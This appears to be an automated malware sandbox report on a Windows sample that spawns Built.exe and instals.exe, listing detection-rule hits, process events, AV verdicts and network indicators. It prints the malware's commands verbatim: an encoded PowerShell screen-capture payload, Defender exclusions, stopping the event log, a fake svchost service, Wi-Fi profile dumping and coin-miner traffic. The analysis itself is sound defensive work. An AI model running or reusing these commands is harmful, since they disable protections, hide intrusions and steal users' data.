AgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Built.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Built.exe, ParentProcessId: 1420, ParentProcessName: Built.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7588, ProcessName: cmd.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\instals.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\instals.exe, ParentProcessId: 3716, ParentProcessName: instals.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 1136, ProcessName: powershell.exe
                Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\47SXvEQ.exe, ProcessId: 6956, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
                Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2944, TargetFilename: C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.cmdline
                Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "NPYIAYNC" binpath= "C:\ProgramData\Microsoft\svchost.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "NPYIAYNC" binpath= "C:\ProgramData\Microsoft\svchost.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\instals.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\instals.exe, ParentProcessId: 3716, ParentProcessName: instals.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "NPYIAYNC" binpath= "C:\ProgramData\Microsoft\svchost.exe" start= "auto", ProcessId: 6164, ProcessName: sc.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\instals.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\instals.exe, ParentProcessId: 3716, ParentProcessName: instals.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 1136, ProcessName: powershell.exe
                Source: Process startedAuthor: vburov: Data: Command: C:\ProgramData\Microsoft\svchost.exe, CommandLine: C:\ProgramData\Microsoft\svchost.exe, CommandLine|base64offset|contains: , Image: C:\ProgramData\Microsoft\svchost.exe, NewProcessName: C:\ProgramData\Microsoft\svchost.exe, OriginalFileName: C:\ProgramData\Microsoft\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\ProgramData\Microsoft\svchost.exe, ProcessId: 6024, ProcessName: svchost.exe

                Data Obfuscation

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\instals.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\instals.exe, ParentProcessId: 3716, ParentProcessName: instals.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 7592, ProcessName: sc.exe

                Stealing of Sensitive Information

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Built.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Built.exe, ParentProcessId: 1420, ParentProcessName: Built.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7716, ProcessName: cmd.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T21:01:26.329826+010020362892Crypto Currency Mining Activity Detected192.168.2.4517161.1.1.153UDP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 47SXvEQ.exeAvira: detected
                Source: 47SXvEQ.exeReversingLabs: Detection: 21%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                Source: 47SXvEQ.exeJoe Sandbox ML: detected

                Bitcoin Miner

                barindex
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: 47SXvEQ.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: Binary string: D:\_w\1\b\bin\amd64\select.pdb source: Built.exe
                Source: Binary string: D:\_w\1\b\bin\amd64\sqlite3.pdb source: Built.exe
                Source: Binary string: D:\_w\1\b\bin\amd64\_sqlite3.pdb source: Built.exe
                Source: Binary string: D:\_w\1\b\bin\amd64\_ctypes.pdb source: Built.exe
                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: Built.exe
                Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: Built.exe
                Source: Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: Built.exe
                Source: Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: Built.exe
                Source: Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: Built.exe
                Source: Binary string: D:\_w\1\b\bin\amd64\_ssl.pdb source: Built.exe
                Source: Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: Built.exe
                Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: Built.exe
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF6266483B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00007FF6266483B0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF6266492F0 FindFirstFileExW,FindClose,4_2_00007FF6266492F0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 4_2_00007FF6266618E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF6266618E4
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF6266492F0 FindFirstFileExW,FindClose,5_2_00007FF6266492F0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF6266618E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF6266618E4
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FF6266483B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00007FF6266483B0
                Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 5_2_00007FFDF10C3229 MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFE1FF9F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte,5_2_00007FFDF10C3229
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\imagesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_localesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\cssJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\htmlJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bgJump to behavior
                Source: global trafficTCP traffic: 192.168.2.4:57111 -> 162.159.36.2:53
                Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                Source: Joe Sandbox ViewIP Address: 162.159.135.232 162.159.135.232
                Source: unknownDNS query: name: ip-api.com
                Source: unknownDNS query: name: ip-api.com
                Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.4:51716 -> 1.1.1.1:53
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
